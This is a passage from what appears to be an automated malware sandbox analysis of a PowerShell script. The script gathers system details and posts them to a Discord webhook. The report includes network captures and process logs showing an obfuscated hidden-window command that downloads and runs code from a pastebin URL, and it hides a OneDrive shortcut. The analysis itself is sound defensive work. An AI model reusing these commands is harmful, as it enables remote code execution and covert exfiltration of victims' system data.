                                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                            2024-10-15 15:58:23 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                            2024-10-15 15:58:23 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                            2024-10-15 15:58:23 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                            2024-10-15 15:58:23 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.849717162.159.136.2324435180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 15:58:30 UTC311OUTPOST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:30 UTC299OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 75 62 65 72 74 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 41 5f 5f 5a 43 43 31 39 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** A__ZCC19\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 15:58:30 UTC1257INHTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 15:58:30 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729007911
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BjDcbXOtu8bjtVf6UAQTIHmcX3N1YRay35WRcBJEklTHaXW5y8fHiwFoTubuCmErCybkxzVGv%2F8FR0Jgr1Cu2v4SisBHOZhAuPrV3eN468cKhBsNItqX%2BTH6%2BYQp"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=19a8aa67251f730d1a261752bff7f45d45000c44-1729007910; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=sUAjXejYQfsWL.eiu_X9eQrmoyrWjOvVstrleAJG2ZQ-1729007910365-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d3102cf2cef461a-DFW
                                                            2024-10-15 15:58:30 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.849718162.159.136.2324432716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 15:58:36 UTC311OUTPOST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:36 UTC299OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 75 62 65 72 74 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 41 5f 5f 5a 43 43 31 39 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** A__ZCC19\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 15:58:37 UTC1251INHTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 15:58:36 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729007918
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J5rW2ejVkeP9d6fx5BgcD39XtRYbhZ13KlAeK4EP3cESF0Fee9RUk7FuTNVA3mGkjYwemcC1x%2FJyvOD0BcrV7UQ3U0uXXktV6qfbLRpLdciqVijT0oTT7xdKo2KP"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=17847e3806a41616fa7f1cec02ab096d50e81535-1729007916; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=bhfVtuJAed2Y8F6zsSmHM7BsWdGa30oKEA6EcrLXXC0-1729007916984-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d3102f8887ee70e-DFW
                                                            2024-10-15 15:58:37 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:11:57:57
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1"
                                                            Imagebase:0x7ff6cb6b0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:11:57:57
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:11:58:11
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\forfiles.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                            Imagebase:0x7ff6fa080000
                                                            File size:52'224 bytes
                                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:11:58:11
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:11:58:11
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                            Imagebase:0x7ff74c170000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:11:58:11
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                            Imagebase:0x7ff6cb6b0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:11:58:11
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                            Imagebase:0x7ff6cb6b0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:11:58:19
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\forfiles.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                            Imagebase:0x7ff6fa080000
                                                            File size:52'224 bytes
                                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:11:58:19
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:11:58:19
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                            Imagebase:0x7ff6cb6b0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:11:58:19
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                            Imagebase:0x7ff6cb6b0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Executed Functions

                                                              Function 00007FFB4B06C8E2 Relevance: .5, Instructions: 460COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc4bc6ecbbaefc2d1b26450028f43dea043d4b4d8edfeee46dcaf32472b6983f
                                                              • Instruction ID: 58632e4e21a7259791f458185ccd0f7a09b12ec0ce93900d034d1e36bea5f94f
                                                              • Opcode Fuzzy Hash: fc4bc6ecbbaefc2d1b26450028f43dea043d4b4d8edfeee46dcaf32472b6983f
                                                              • Instruction Fuzzy Hash: 13E1B47090CA4E8FEBA8EF2CD8557E977D1EF54311F04826ED84DC7291DE7899418B81
                                                              Function 00007FFB4B06BB80 Relevance: .4, Instructions: 444COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be2c3c13c01b7a432fe137fa5d0516aa1f818dd5e40956897e56248b0bf3e9c5
                                                              • Instruction ID: bbf0bfc8a3120a696280579c9d1677b618bdeaa1b9110306784634d049d7fe07
                                                              • Opcode Fuzzy Hash: be2c3c13c01b7a432fe137fa5d0516aa1f818dd5e40956897e56248b0bf3e9c5
                                                              • Instruction Fuzzy Hash: 93E183B0918A4D8FEBA8EF2CC8567E977D1FB54311F00826EE80EC7291DB3499458B81
                                                              Function 00007FFB4B134141 Relevance: 1.9, Strings: 1, Instructions: 608COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1661116590.00007FFB4B130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b130000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: B
                                                              • API String ID: 0-1255198513
                                                              • Opcode ID: 92cc626d2eb2f9f7e806ea1e9d926480ccb34f9b83b1e79c2896bca281fe8d39
                                                              • Instruction ID: f32c26d5b517f6886cd69fb1280c9c7d4b3981d86659bb45ec53b99a3b1d534b
                                                              • Opcode Fuzzy Hash: 92cc626d2eb2f9f7e806ea1e9d926480ccb34f9b83b1e79c2896bca281fe8d39
                                                              • Instruction Fuzzy Hash: 4D1247B2A1DA894FFB95EF7CD8541747BE1EF55314B0841BAD14CC71A3EA289C06CB41
                                                              Function 00007FFB4B1342F2 Relevance: 1.6, Strings: 1, Instructions: 319COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1661116590.00007FFB4B130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b130000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: B
                                                              • API String ID: 0-1255198513
                                                              • Opcode ID: f2d3f9a41b05d5ed8efdb3a12670e6a43f6437e805deaf5bcc36ea1922cc6f79
                                                              • Instruction ID: bb4c03e2bb74d57cacff5f9e388ec597bbcad2244095ebc6939923e7e4196f9f
                                                              • Opcode Fuzzy Hash: f2d3f9a41b05d5ed8efdb3a12670e6a43f6437e805deaf5bcc36ea1922cc6f79
                                                              • Instruction Fuzzy Hash: 97A127B2E2CA4A4FFB94EF6CC85417877D1FF55318B4451BAD14DC71A2EA28AC028B41
                                                              Function 00007FFB4B07182D Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: x38K
                                                              • API String ID: 0-1601382469
                                                              • Opcode ID: a27d5ca837ec0ea42dd73adb4a73ac44849085fab29c2d36fb1d043e9b124ca7
                                                              • Instruction ID: 32507aa6de54e334780c60c3da750fbfdf539aea30b8320ec0db72956df2972f
                                                              • Opcode Fuzzy Hash: a27d5ca837ec0ea42dd73adb4a73ac44849085fab29c2d36fb1d043e9b124ca7
                                                              • Instruction Fuzzy Hash: 9601C49944E3C25ED39367345C655A2BFE48E4322671C45FBE0D8C91A3E8580865C353
                                                              Function 00007FFB4B06C4F6 Relevance: .3, Instructions: 333COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 156d79aa710f5e0cdffb327ea26ea73f16453b0d20b70a6a5a2b9db3ca532c23
                                                              • Instruction ID: f7e432264a65b24043b4d8eee020e576c7ee3986a0708446f9cd17b142869df9
                                                              • Opcode Fuzzy Hash: 156d79aa710f5e0cdffb327ea26ea73f16453b0d20b70a6a5a2b9db3ca532c23
                                                              • Instruction Fuzzy Hash: 8CB1E47050CA4D8FEB69EF28D8557F93BD1EF55311F04826EE84DC3292CA78A945CB82
                                                              Function 00007FFB4B06ED6A Relevance: .2, Instructions: 246COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e87600ae63a8a2f115561b85ed908454d9565273a5dbbcee03f8c9a232c86d29
                                                              • Instruction ID: c2f7b0a7dfdba1a4aa9d67740b34804a25991dcd76fcc575cbc64e0b029b2ba4
                                                              • Opcode Fuzzy Hash: e87600ae63a8a2f115561b85ed908454d9565273a5dbbcee03f8c9a232c86d29
                                                              • Instruction Fuzzy Hash: 8B71E2B1A1CB498BE758AF7CD8552BC77D1EF98301F0444BDE58EC36A3CE29A8028645
